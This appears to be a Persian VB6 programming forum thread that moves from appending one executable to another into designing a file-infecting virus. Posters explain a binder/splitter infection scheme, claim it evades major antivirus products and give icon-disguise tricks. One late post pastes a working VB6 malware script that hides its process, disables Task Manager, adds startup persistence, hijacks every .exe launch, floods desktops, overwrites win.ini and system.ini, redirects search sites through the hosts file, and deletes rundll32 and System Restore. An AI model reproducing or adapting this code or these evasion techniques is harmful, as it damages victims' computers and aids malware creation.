سلام
من می خواستم فایل اجرایی که با VB ساختم رو بعد از اجرا به فلان فایل exe اضافه کنم. دوستان دقت کنند که نمی خوام Overwrite بشه. به عبارتی می خوام Append کنم.

اما... اما من چند راه رو امتحان کردم که به نتیجه نرسیدم. فقط تونستم محتویات یک فایل exe رو به صورت باینری توی یک متغیر ذخیره کنم. حالا مسئله اینجاست که چطور اون متغیر رو به انتهای یک فایل اجرایی اضافه کنم.

متشكرم

از فرمان APPEND در Cmd استفاده کن
البته مطمئن نیستم جواب بده.

شما میتونی بگی میخوای با وی بی یه فایل درست کنی و ایمکارو بکنی یا روی هر فایل exe
اگه میخوای با ویبی درست کنی باید به دنبال این چیزا باشی:
binary
put
get

آقا یکی جواب درست و حسابی به من بده. از آقایان ماهان مقدم و keihancpu هم متشکرم حتما امتحانشون می کنم.

اما من مطمئن هستم که این کار تو سه یا چهار خط قابل انجامه.

کمک Please

بذار یه توضیح کلی باست بدم.
ببین من فقط میتونم باست بگم که چطوری میشه رو فایل exe از قبلcompileشده چیزی نوشت.
اگر در غیر این صورت میخوای من بلد نیستم با عرض پوزش.
ما باید از PropertyBag استفاده کنیم توی پروژهای که میخوای رو فایلت رونشت کن این کد رو بنویس:
dim vartemp as variant
dim beginpos as long
dim propbag as new propertybag
dim file$
open inputfile for binary as #1
file$=space$(lof(1))
$get#1,,file
close#1


with propbag
.$)writeproperty(file
end with
f=freefile
open Filename for Binary as #f
beginpos = lof(f)
vartemp = propbag.contents
seek #f,lof(1)
put#f,,vartemp
put#f,,beginpos
close #f
این باسه قسمت رونوشت بود اگه مد نظزت اینه بگو تا کدهای فایل کامپایل شده رو بهت بدم.

http://barnamenevis.org/forum/showthread.php?t=105195
اینجا کمی در مورد این موضوع بحث شده و کمی هم کد نوشته شده اما در کل به یک نتیجه ی قطعی نرسیده.

Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" _
(ByVal dwFlags As Long, lpSource As Any, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, _
ByVal lpBuffer As String, ByVal nSize As Long, Arguments As Long) As Long

Private Const FORMAT_MESSAGE_ALLOCATE_BUFFER = &H100
Private Sub Command1_Click()
Open "file1" For Binary As #1
Open "file2" For Binary As #2
issame% = True
If LOF(1) <> LOF(2) Then
issame% = False
Else
whole& = LOF(1) \ 10000 'number of whole 10,000 byte chunks
part& = LOF(1) Mod 10000 'remaining bytes at end of file
buffer1$ = String$(10000, 0)
buffer2$ = String$(10000, 0)
start& = 1
For x& = 1 To whole& 'this for-next loop will get 10,000
Get #1, start&, buffer1$ 'byte chunks at a time.
Get #2, start&, buffer2$
If buffer1$ <> buffer2$ Then
issame% = False
Exit For
End If
start& = start& + 10000
Next
buffer1$ = String$(part&, 0)
buffer2$ = String$(part&, 0)
Get #1, start&, buffer1$ 'get the remaining bytes at the end
Get #2, start&, buffer2$ 'get the remaining bytes at the end
If buffer1$ <> buffer2$ Then issame% = False
End If
Close
If issame% Then
MsgBox "Files are identical", 64, "Info"
Else
MsgBox "Files are NOT identical", 16, "Info"
End If
End Sub


شاید به دردت بخورن

سلام
شما یه جوری W32.Hidrage.a یا همون W32.jeefo.a رو پیدا کن و فایلتو به اون اضافه کن . این طوری برنامه تو به تمام فایل های اجرایی میچسبه . یا از تکنیک های برنامه های ساخت ویروس یا AS استفاده کن .

سلام
دوستان اگه یه مثال با سورس بذارن خیلی خوب میشه .
ممنون

سلام
شما یه جوری W32.Hidrage.a یا همون W32.jeefo.a رو پیدا کن و فایلتو به اون اضافه کن . این طوری برنامه تو به تمام فایل های اجرایی میچسبه . یا از تکنیک های برنامه های ساخت ویروس یا AS استفاده کن .
ویروسی که گفتین توسط انتی ها شناخته میشن پس غیر عملیه

من که آخر نفهمیدم هر کی یه چیزی میگه

ویروسی که گفتین توسط انتی ها شناخته میشن پس غیر عملیه
---------------------------------------------------
سلام
درسته شناخته میشه .
ولی برای سیستم هایی که آنتی ویروس ندارن 100% عملیه . ولی روش دوم که استفاده از AS در هر نوع سیستمی عملیه .

برای این کار شما باید از سکشنها استفاده کنید

دست همگی درد نکنه. ممنون روش های گفته شده رو امتحان می کنم.

ولی ویروس های jeefo و Hidraje علاوه بر این کار ممکن است خرابکاری دیگه ای هم بکنند.

باز هم از همتون متشکرم.

ویروس های jeefo و Hidraje علاوه بر این کار ممکن است خرابکاری دیگه ای هم بکنند.

سلام دوستان ببخشید اگه میشه بگید این ویروسها چه کارهای دیگه انجام میدم و برای پاک کردنش باید چیکار کرد.؟

عزیزم ببین این یه ویروس خطرناکه که به فایلها میچسبه و اونا رو طوری خراب می کنه که به احتمال 88 % دیگه آنتی ویروس نمیتونه اونا رو ترمیم کنه . در ضمن باعث آلودگی فایل svchost.exe هم میشه . راستی سرعت رو هم پایین میاره . ( این 88 درصد هم به خاطر این نوشتم که شاید در آینده آنتی ویروسی پیدا بشه که بتونه فایلهای آلوده به ویروس رو پاکسازی کنه) .

دوستان بحث رو منحرف نکنید تا تاپیک پابرجا بمونه.

اتصال فایل اجرایی مانند اتصال فایل های دیگه با فایل اجرایی نیست.

اتصال فایل اجرایی به فایل اجرایی میزبان بطوری که با اجرای میزبان، اجرا بشه،
کار سطح بالاییه.

برای این منظور باید
- با ساختار فایل های EXE آشنا بشید.
- با زبان اسمبلی تا حدودی آشنا باشید.
- برنامه نویس سطح متوسط به بالایی باشید.

یک فایل اجرایی بعد از اجرا مراحلی رو طی می کنه و از نقطه ی مشخصی ( بسته به نوع فایل اجرایی) شروع به اجرا می کنه.
بنابراین فایل اجرایی شما بابید آدرس شروع خودش رو در مکان مربوطه قرار بده و در ضمن باید فایل اصلی رو نیز اجرا کنه.

علاوه براین قسمت های دیگه فایل اجرایی که بحثشون مفصله نیز باید با فایل میزبان ادغام بشن که کار رو دشوارتر از قبل می کنه.

یادش بخیر این اولین تاپیک و اولین پستی بود که من تو این سایت دادم.

من هم تعجب کردم وقتی دیدم بحث تاپیک داره منحرف میشه.

راستش من تقریبا یک هفته بعد از دادن این تاپیک به جواب خودم رسیدم البته نه از طریق این سایت.

بلکه با روزی ده ساعت ور رفتن با VB.

اگه دوستان روش انجام این کارو میخوان بفرمایند تا بنده توضیحات کاملی در این مورد بدم.

بازم یادش بخیر:چشمک:

تئوری کار بسیار ساده است اما نوشتن کد اون کمی مشکله خصوصا بخشی که با آنتی ویروسها سروکار داره.
اما ساده ترین راه اینه
فایل اجرایی شما که باید به فایل میزبان بچسبه عملا بر عکس عمل میکنه .
1- فایل شما محتویات فایل میزبان را خوانده و به انتهای خود الحاق می کند و فایل نهایی را با نام میزبان بازنویسی می کند.
2- هنگام اجرا ابتدا فایل شما اجرا می شود (ان شاءالله که ویروس نیست)
3- سپس فایل میزبان الحاق شده به خود را در شاخه Temp ویندوز بازنویسی می کند(البته هر جایی می تواند باشد و با کمی تلاش می توانید دو فایل همنام در یک شاخه هم داشته باشید)
4- برنامه شما فایل میزبان بازنویس شده را اجرا می کند.
البته این حالت بسیار بسیار ساده بود ولی حسنی که دارد این استکه برنامه نوشته شده توسط شما (انشاء الله که مخرب نیست) توسط نرم افزارهای ویروس یاب قابل شناسایی نیست و براحتی می تونید کدهای خود را بلافاصله تغییر دهید و شما همیشه یک مرحله جلوتر از آنتی ویروسها هستید.

- در خاتمه می توانید قابلیتهای دیگری هم به برنامه خود اضافه کنید تا کارهای بیشتری انجام دهد . از جمله اینکه بصورت یکی از سرویسهای ویندوز اجرا شود که دیگر نور علی نور هست.

عزیزان اگه منطورتون به منه ، من قصد نداشتم بحث تاپیک رو منحرف کنم . فقط میخاستم جواب یکی از دوستان رو داده باشم .
در هر حال اگه باعث انحراف در بحث تاپیک شدم ، معذرت میخام .

یادش بخیر این اولین تاپیک و اولین پستی بود که من تو این سایت دادم.

من هم تعجب کردم وقتی دیدم بحث تاپیک داره منحرف میشه.

راستش من تقریبا یک هفته بعد از دادن این تاپیک به جواب خودم رسیدم البته نه از طریق این سایت.

بلکه با روزی ده ساعت ور رفتن با VB.

اگه دوستان روش انجام این کارو میخوان بفرمایند تا بنده توضیحات کاملی در این مورد بدم.

بازم یادش بخیر:چشمک:
اگه توضیحی بدید یک تشکر از طرف من طلبکارید چون من خیلی لازم دارم.

عزیزم ببین این یه ویروس خطرناکه که به فایلها میچسبه و اونا رو طوری خراب می کنه که به احتمال 88 % دیگه آنتی ویروس نمیتونه اونا رو ترمیم کنه . در ضمن باعث آلودگی فایل svchost.exe هم میشه . راستی سرعت رو هم پایین میاره . ( این 88 درصد هم به خاطر این نوشتم که شاید در آینده آنتی ویروسی پیدا بشه که بتونه فایلهای آلوده به ویروس رو پاکسازی کنه) .

سلام
چرا 88 درصد !؟
اگه کسپراسکای 2009 رو نصب کنید می بینید که بیش از 90 - 95 درصد فایلهای ویروسی رو درست می کنه ! چند روزه پیش انتی ویروسم رو حذف کردم و دنبال یه انتی ویروس جدید بودم که ویروس hid... وارد سیستمم شد که با نصب کسپراسکای مشکل 100 درصد رفع شد ! این در حالیست که انتی ویروس Nod نتونست کاری کنه!

حالا کاری با این نداریم ! ربطی به تاپیک نداره ! فقط جهت اطلاع دوستان گفتم.

راستی یه چیزی در مورد نحوه ی کارکرد این نوع ویروس ها:
این روشی که این نوع ویروس ها استفاده می کنن خیلی خیلی فرق داره و اصلا با چسبوندن به اخره فایل کاری نداره ! در واقع ویروس خودشو به بخشی از فایلهای اجرایی می چسبونه(نه به اخر یا اول) بعد کل فایلو به حافظه Load می کنه!

اگه بخواید فایل اجرایی مورد نظرتونو بچسبونید به اخره فایل مخرب و بعد اجرا کنید ، این می شه SelfExtract ، پس اول باید فایل قربانی رو Extract کنه بعد اجراش کنه که نتیجش اینه که فایل از یه مسیر دیگه اجرا می شه(فوقش در کناره فایل کپی می شه بعد اجرا میشه) ... البته شادید بگید چه اشکالی داره !؟ عملی هست ولی بسته به نیاز برنامه نویس ، که می خواد چه بلایی سر کاربرایه فلک زده بیاره !

زیاد نوشتم ! بی خیال !

اولا اینکه بخواید با فایلتون کاری کنید که مستقیم رویه حافظه قرار بگیره نیاز به برنامه نویسیه پیشرفته داره و خدا رو شکر با وی بی امکان پذیر نیست ! وگرنه الان همه مون سرتا پا سرویس بودیم:لبخند: ! در ضمن باید با ساختار فایل اجرایی اشنا باشید !


یه سورس می زارم تا حد قابله توجی می تونه راضیتون کنه ! چرا ؟
چون علاوه بر اینکه می تونین فایلی به اخره فایل خودتون بچسبونین ، می تونین یه سری اطلاعات به صورت متنی (می تونین کدش کنید) در اون ذخیره کنین تا هر کاربر رو به روشی متفاوت بترکونین :لبخند::گیج:




مطمئنن هیچ کس کل چیزایی که نوشتم رو نخونده و یه راست همه اومدن سورسو دانلود کنن !!
:لبخند::لبخند:

سلام
ایده، ایده ساده ایست اما یه خوده وقت گیره.
اگه هدف ساخت ویروس باشه ایده، ایده جدیدی ست.

دوستان من این کارو برای پروژه پایان دوره‌ام می خواستم انجام بدم که ساخت یک ویروس ساده بود.
تو این چند خطی هم که توضیح دادم منظور از ویروس برنامه ای هست که قراره به فایل اجرایی دیگر اضافه شود.

به مدیر بخش: "هدف آموزش ساخت ویروس نیست"

خب برای این کارنیاز به یافتن نقطه پایانی فایل هست که کار پر دردسری هست آخه فایل های exe ساختار پیچیده ای دارند و ممکن است در هنگام اجرا یک روتین از محتویات فایل بارها تکرار بشه و یکی دیگه اصلا اجرا نشه به همین دلیله که میگم نمیشه نقطه پایانی رو بدست آورد.

اون موقع ها هم که این تاپیکو دادم دقيقا مشكل همين جا بود كه نقطه پاياني فايل exe اصلي رو نمي تونستم پيدا كنم. با خودم گفتم:
لازم نیست حتماً ویروس به انتهای برنامه بچسبه - میتونه اول هم باشه
اما يادمه اين ايده هم كارساز نبود. چون:
باز اونوقت اين تنها ويروس بود كه اجرا مي شد. با محتويات فايل اصلي ولي بدون اجراي آن.

اين طوري كه نمي شد. بالاخره يا بايد ته فايل يا سر فايل رو نشونه گرفت.
اين شد كه من يك فكري به سرم زد و هيچ كدوم از اين دو راه انتخاب نكردم.
اون فكر اين بود: ‌(فايل + يك علامت + ويروس)
لابد تا ته قضيه رو خونديد.

آره دوستان. يك متغير بزرگ درنظر گرفتيم و يكي يكي از راست به چپ ريختيم توش.
نكته مهم اينجا بود كه اون علامت مي بايست انحصاري باشد. يعني يك يا چند كاراكتر كه مطمئن باشيد در هيچ كجاي اون فايل قرباني چنين كاراكترهايي به صورت پشت سر هم پيدا نميشه.

در انتها هم همه محتويات اون متغير بزرگه رو به عنوان فايل اصلي در محل فايل قرباني با نام فايل قرباني overwrite مي كنيم.

اما اين انتهاي كار نبود آخه اون فايل به چه درد مي خورد ؟ ! ؟
براي همين محتويات فايل نهايي رو يكمي تغيير دادم:
( فايل Spliter + علامت + فايل اصلي + علامت + ويروس)

خب تا به اينجا ما ويروسو ساختيم و فايل قرباني هم آلوده كرديم. اما...

اما اون فايل spliter چيست؟

جواب: يك برنامه كوچولو موچولو كه خودشو تيكه تيكه كنه.
به اين صورت كه از ابتداي فايل شروع به خواندن كنه و هروقت كه به علامت ما رسيد تا آنجا را به عنوان يك فايل ذخيره كند. اين ذخيره سازي در يك محل دور از دسترس كاربر هست كه بستگي به خود برنامه نويس داره. در آخر فايل ها رو يكي يكي اجرا كنه.

دوستان عزيز اين فرمت كار بيشتر شبيه چيه؟ بله. درست حدس زدين نرم افزار هاي Binder و يا همان Blender ها. اين نرم افزارها قادر هستند بيشتر از دو فايل را به هم متصل كنند. البته با كمي تغييرات.


من هم نمي دونم آيا همه ويروس ها از اين روش استفاده مي كنند يا نه شايد اين يك ايده جديد يا يك سوء استفاده توپ از الگوريتم يك نرم افزاره. آخه آقاي فرد كوهن هم كه سي سال پيش برنامه اي نوشت كه بتواند خود را تكثير كند شايد فكر اين رو نمي كرد كه اين روش برنامه نويسي او به عنوان معضلي در عالم كامپيوتر واقع شود.

بهتره به تعدادي از سؤال ها كه هنوز پرسيده نشده اند جواب بدم:

1- در مورد زمان

cpu هم هيچ نگراني وجود نداره چون اين ويروس با سرعت بسيار زيادي يه چيزي حدود 20 فايل در 3 ثانيه اون هم از درايوي كه ويندوز توش نصبه كارش رو به نحو عالي انجام ميده.

2- معروف ترين آنتي ويروس ها قادر به شناسايي اون نيست. از قبيل Symantec , McAfee , Kaspersky. شايد به خاطر همون جديد بودن ايده اش هست. آخه اگه قرار باشه آنتي ويروسي بهش گير بده بايد همه نرم افزارهاي Binder رو هم ويروس معرفي كنه.

3- مهمترين ويژگي فايل قرباني standalone بودن اون هست. كه به محض آلوده شدن قابل حمل به روي ديگر كامپيوترهاست و با اجرا شدنش در يك كامپيتر ديگر شروع به آلوده سازي فايل هاش مي كنه

4- همون طور كه بالاتر متذكر شدم حتما بايد علامت درنظر گرفته شده يك علامت انحصاري و خاص بوده. مي تونه عدد يا يك كاراكتر يا يك رشته باشه. كه رشته از همه بهتر است. اين مورد تست شده است.

5- فايل spliter رو خودمون تو یک پروژه جدید می نویسیم و بعد به صورت Resource به برنامه ويروس اضافه مي كنيم و در همان ابتداي شروع كار اونو يك جاي دنج مثل محل زندگي من مي زاريم.

6- و اما نقطه ظعفي كه اين ويروس داره و باعث ميشه كه كاربران متوسط شك و كاربران حرفه اي يقين به ويروس بودن آن كنند آيكن فايل هاي خروجي آن است. چي بد ! همون طور كه دوستان مي دونند آيكن فايل خروجي همان آيكن فايلي خواهد شد كه در ابتداي داده هاي خروجي قرار دارد (همون متغير بزرگه). يعني آيكن فايل قرباني به آيكن فايل spliter تبديل ميشه. كه حداقل براي طبيعي تر شدن من آيكن فايل spliter رو آيكن فايل هاي COM درنظر گرفتم.

7- چاره اي جز اين نداريم كه فايل spliter رو در ابتدا قرار بديم. چون اون هست كه بايد اول اجرا بشه تا از درون خودش فايل سالم و فايل ويروس رو استخراج كنه. در غير اين صورت spliter هيچگاه اجرا نشده و ويروس هم فعاليتش را انجام نمي دهد. اين مورد تست شده.

موفق باشید/

سلام

یعنی شما منظورتون اینه که فایل اصلی باید استخراج شه ، بعد اجرا شه ؟

راستی فکر نمی کنم یه ایده ی جدید باشه که بخواید یه علامت بگذارید بعد فایل فلان رو ، بعد هم دو باره علامت ...!!

جز این چیزه دیگه ای نمی تونه باشه !! البته می تونه باشه در صورتی که به این صورت باشه :
ویروس + فایل قربانی !
حالا چطور !؟ ویروس حجمه خودشو داره (مثلا 120000 بایت) . میاد و از بایته 120001 به بعد رو تا اخره فایل استخراج می کنه ! این میشه فایل قربانی !

یه چیزایی داره یادم می یاد !! :لبخندساده:
اره تویه یه پروژه بکار بردم و البته چنیدین و چند فایل رو اضاف می کردم ! البته ویروس نبود !

حالا در مورد علامت + فایل :
1- فایلهای فشرده رو دقت کنید(...Rar or Zip or) !! بین هر فایله فشرده شده در ارشیو یه سری کارکتر وجود داره که مشخص می کنه که از اینجایه فایل به بعد فایله بعدیه ارشیوه ! در بین این علامت ها (البته بعضی نوع فایلها) حجم فایل بعدی رو هم نوشته تا برنامه ی اکسترکتور بدونه از کجا تا کجا رو باید به عنوانه هدفش داشته باشه !

2- فایلهای SelfExtractor ی که WinRaR می سازه رو هم اگه دقت کنید از یه همچین روشی استفاده کرده.


راستی مشکله ایکون :

فایل ویروس می یاد خودشو جایی کپی می کنه (فایله اصلی و خالصش رو) !

ایکونه خودشو عوض می کنه !

بعد هم که فایل قزبانی رو به خودش به این ترتیب اضاف می کنه : ویروس + علامت + فایل اصلی + علامت بزرگتر ببخشید نه کوچکتر:لبخند: !!

:لبخندساده:

فکر کنم جیفو مثله پکر ها عمل می کرد ! در واقع فایل قربانی رو یه راست به رم می برد ! و از استخراج خبری نبود !


این چیزایی هم که شما گفتی عملی هست ! شاید یه سری مشکلات هم داشته باشه که یه خرده روش فکر بشه ، حل شدنی هست !

یعنی شما منظورتون اینه که فایل اصلی باید استخراج شه ، بعد اجرا شه ؟


بله



ویروس + فایل قربانی !
حالا چطور !؟ ویروس حجمه خودشو داره (مثلا 120000 بایت) . میاد و از بایته 120001 به بعد رو تا اخره فایل استخراج می کنه ! این میشه فایل قربانی !


می تونم به جرات بگم 95 شایدم 99 درصد ویروس ها از این روش استفاده می کنند و آنتی ها بهشون گیر میده. ولی من می خواستم یه روش جدید باشه.



حالا در مورد علامت + فایل :
1- فایلهای فشرده رو دقت کنید(...Rar or Zip or) !! بین هر فایله فشرده شده در ارشیو یه سری کارکتر وجود داره که مشخص می کنه که از اینجایه فایل به بعد فایله بعدیه ارشیوه ! در بین این علامت ها (البته بعضی نوع فایلها) حجم فایل بعدی رو هم نوشته تا برنامه ی اکسترکتور بدونه از کجا تا کجا رو باید به عنوانه هدفش داشته باشه !

2- فایلهای SelfExtractor ی که WinRaR می سازه رو هم اگه دقت کنید از یه همچین روشی استفاده کرده.


درسته که این روشو برنامه های دیگه هم استفاده می کنند ولی من گفتم روش جدید برای ساخت ویروس.



ایکونه خودشو عوض می کنه !

بعد هم که فایل قزبانی رو به خودش به این ترتیب اضاف می کنه : ویروس + علامت + فایل اصلی + علامت بزرگتر ببخشید نه کوچکتر:لبخند: !!

:لبخندساده:


منظورتونو نفهمیدم.




این چیزایی هم که شما گفتی عملی هست ! شاید یه سری مشکلات هم داشته باشه که یه خرده روش فکر بشه ، حل شدنی هست !


دوست دارم اگه مشکلی داره برطرفش کنم اگه شما نظری در این مورد دارید بفرمایید. ممنون میشم.

راستی یادمون نره که جیفو با یک زبان سطح پایین نوشته شده بود.

منظورتونو نفهمیدم.
ساده اس !
اگه یه جستجو بکنید ، سورس هایی در این رابطه پیدا می کنید ! یعنی ایکونه فایله ویروس رو عوض می کنید بعد هم به همون ترتیب که خودتون گفتین فایل قربانی رو می ترکونین (:


می تونم به جرات بگم 95 شایدم 99 درصد ویروس ها از این روش استفاده می کنند و آنتی ها بهشون گیر میده. ولی من می خواستم یه روش جدید باشه.
بستگی به هوش انتی ویروس داره !
اگه زمانی که شما دارید از این روش استفاده می کنید از یه سری کدهای دیگه هم استفاده بکنید (مثلا بستن تسک منیجر - گذاشتن ویروس در استارت اپ - تغییرات پشته سر هم و مشکوک در ریجستری و ...) به احتماله زیاد برنامه تون توسط Anti Virus ها بلوکه می شه !!


شما عملی کنید اگه مشکلی بود بهم بگید !
اگه بتونم و سوادم برسه حتما کمکتون می کنم:لبخندساده:

قبلاً خدمتتون عرض کردم که:

"آيكن فايل خروجي همان آيكن فايلي خواهد شد كه در ابتداي داده هاي خروجي قرار دارد (همون متغير بزرگه). يعني آيكن فايل قرباني به آيكن فايل spliter تبديل ميشه. كه حداقل براي طبيعي تر شدن من آيكن فايل spliter رو آيكن فايل هاي COM درنظر گرفتم."

حالا با این وضعیت چه طور میشه آیکن فایل قربانی (خروجی) تغییر پیدا نکنه؟

ممنون.

خب همین دیگه !

شما ایکن فایل spliter رو تغییر بده !

ایکن تغییر می کنه ! به ایکن spliter هم تبدیل می شه ! چون spliter فایل اول هست (هر چند که به نظره من از spliter استفاده نکنید بهتره!) !

حالا برای حل این مشکل ، اول می یاید فایل spliter رو جایی استخراج می کنید و ایکنش رو به ایکونه فایل قربانی تبدیل می کنید (یعنی ایکونه فایل قربانی رو استخراج می کنید و به spliter می دید)! بعد هم که فایل های دیگه رو به فایله spliter اضاف می کنید !

خیلی ساده است ! و البته عملی !

فکر خوبیه:تشویق: ولی سرعت برنامه رو به میزان قابل توجهی کاهش میده.:متفکر:

ممنونم. امتحانش می کنم اینطوری بهتره.:چشمک:

می تونم به جرات بگم 95 شایدم 99 درصد ویروس ها از این روش استفاده می کنند و آنتی ها بهشون گیر میده. ولی من می خواستم یه روش جدید باشه.


یه ویروس بود که چند سال پیش از روشی که در پست قبلیم گفتم، استفاده می کرد و بصورت کامل خودش رو در فایل اجرایی ادغام می کرد،
که خیلی اسم در کرد.

روش واقعی اون روشه که دشواره.

یه ویروس بود که چند سال پیش از روشی که در پست قبلیم گفتم، استفاده می کرد و بصورت کامل خودش رو در فایل اجرایی ادغام می کرد،
که خیلی اسم در کرد.

روش واقعی اون روشه که دشواره.

CIH قوی ترین ویروس مشاهده شده (http://barnamenevis.org/forum/showthread.php?t=4457)

سلام
( البته می دونم این تاپیک خیلی قدیمیه)
تو این تاپیک همه یا گفتن دشواره یا گفتن یه روش های داره.
-اولا باید تفاوت worm با ویروس مشخص بشه .
-شما قصد ایجاد worm دارید.
-آنتی ویروس ها ساخته انسان هستن ، پس ویروس یا وارم ما می تونه اونو دور بزنه.
-مگه ما چمونه اگه بگیم نمیشه پس نمیشه.
-وارم خودشو دقیقا به فایل exe نمی چسبونه ، بلکه خودشو آدرس دهی می کنه ، یعنی فقط به بعضی از فایل ها که پک نشدن یه ماژول اضافه می کنه.
-به صورت یه فایل com یا vbs یا dll-sr یا exe یا java وارد میشه و اون ماژول رو اضافه می کنه.(که شما احتمالا نمونه هاشو تو فلشتون دیدید که فایل com سیستم رو آلوده می کنه و تبدیل به exe میشه)
-ماژول درواقع با اجرا شدن فایل Exe اجرا مشه و شروع به بدست آوردن path می کنه.
یه وارم دقیقا یه فایل نیست بلکه یه کد مخربه که توسط آنتی ویروس ها در صورت به روز بودن شناسایی می شه.
Private Sub Form_Load()
On Error Resume Next
'This command will allow the application to continue running
'even if an error occurs instead of terminating/closing.
Hide
'This command will hide the application from even being seen on the victims
'screen even if your program has it's settings set to Visible|True
App.TaskVisible = False
'This command is even better, this command will stop your program
'from showing up in Task Manager-Applications Tab List, but it will still
'show up in process list, sorry =/
End Sub Ok now let's move on to some fun, here are some scripts i like to use
hope they help you, they're simple but they do the job.
Disable TaskManager
Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", vbHide


By using Shell, u can use any single CMD command, and by adding

,vbHide after it, CMD will not appear and the victim will not be aware that anything has happened.



Here is a phew more commands for Shell using VB 6.0 Pro:

Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
'This command will make your application start with windows.

Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
'This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example.

Shell "REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
'These commands will set the time & date for the victims computer permanently
'Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
'for the date.

FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
'This code well, it couldn't be more obvious what it does, but when copying your virus/worm ect
'to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
'to get rid of your virus/worm/trojan ect.


Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & "\" & App.EXEName & ".EXE", "c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe" & intResult & ".exe"
'Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
'interval set to "1" when this code runs, all user accounts desktops will be flooded with your virus and the longer it
'runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
' C:\DOCU~\All Users\Start Menu\Programs\Start up\
'That will cause the victim alot of hassle =P.

Kill "c:\windows\win.ini"
Kill "c:\windows\system.ini"
Open "c:\WINDOWS\win.ini" For Output As #1
Print #1, "Load = C:\Program Files\Virus1.exe"
Print #1, "run = C:\Program Files\Virus2.exe"
Close #1
Open "c:\WINDOWS\system.ini" For Output As #1
Print #1, "Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe"
Print #1, "Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe"
Close #1
'Ok people more fun, making your application start with windows, without using Registry or DOS
'one little alter and your viruses and start with windows and the victim will not know how.

Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, "208.65.153.251 208.65.153.251 "
Print #1, "208.65.153.251 www.google.com"
Print #1, "208.65.153.251 www.google.co.uk"
Print #1, "208.65.153.251 www.yahoo.com"
Print #1, "208.65.153.251 www.yahoo.co.uk"
Print #1, "208.65.153.251 www.askjeeves.com"
Print #1, "208.65.153.251 www.altavista.com"
Print #1, "208.65.153.251 www.alltheweb.com"
Print #1, "208.65.153.251 www.msn.com"
Print #1, "208.65.153.251 www.hotmail.com"
Print #1, "208.65.153.251 www.myspace.com"
Print #1, "208.65.153.251 www.plunder.com"
Print #1, "208.65.153.251 www.quicksharing.com"
Print #1, "208.65.153.251 www.myspace.com"
Close #1
'Just something to help stop the victim from google-ing what the virus has done, and getting information
'or downloads to help rid them of your infection >=P.

Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
'Ok now finally let's get rid of System Restore, Rundll(by deleting this file, the victim can no longer
'view the properties window for any file on his or her computer).

Well thats all. Now run this program.

-----------------------------------------------------
در کل برای مطالبی این چنین شما باید به زبان eng در اینترنت جست و جو کنید و بحث کردن در مورد اون ممنوعه ، پس ادامه نمی دم.
اگه هنوز این تاپیک براتون جالبه خبرم کنید.

سلام
اون قسمتيش كه مرتبط ميشد با موضوع اين تاپيك اينجاش بود:


Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
'This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example.

دقت كنيد كه اين كار باعث ميشه كه تمام فايل هاي exe زمان اجرا شدن به فايل ما لينك كنند و تنها فايل ما اجرا ميشه. و دقت كنيد كه Explorer.exe هم زمان بالا امدن ويندوز اجرا نميشه و فايل ما بجاش اجرا ميشه.
اين كار اصلاً درست نيست به دو دليل:
1- كاربر كاملاً ميفهمه كه چه بلايي سرش امده، چون هر فايلي كه اجرا ميكنه برنامه ما بجاش اجرا ميشه.
2- اين برنامه اي كه ما ساختيم فايل هاي exe رو آلوده نميكنه پس با انتقال هر فايل exe اي به روي ساير سيستم ها هيچ اتفاقي نميفته.

يكجاي كامنت ها هم نويسنده خودش به اين موضوع اشاره كرده.
----------------
دوست عزيز بهتون پيشنهاد مي كنم يكم پست تون رو سانسور كنيد. بد آموزي داره.:چشمک: و ممكنه باعث قفل شدن و يا كلا پاك شدن تاپيك بشه.
متشكرم

حالا برای حل این مشکل ، اول می یاید فایل spliter رو جایی استخراج می کنید و ایکنش رو به ایکونه فایل قربانی تبدیل می کنید (یعنی ایکونه فایل قربانی رو استخراج می کنید و به spliter می دید)! بعد هم که فایل های دیگه رو به فایله spliter اضاف می کنید !
خیلی ساده است ! و البته عملی !




فکر خوبیه ولی سرعت برنامه رو به میزان قابل توجهی کاهش میده.
ممنونم. امتحانش می کنم اینطوری بهتره.

سلام .
دوستان عزیز ؛ ظاهراً دوباره شاهد یک تاپیک بی نتیجه هستیم .
اگه ممکنه نتایج بدست اومده رو اعلام کنین .

من کلاً 2 روش کلی از همه این مباحث برداشت کردم :
1 - فایل exe ما به یک Application بچسبه !
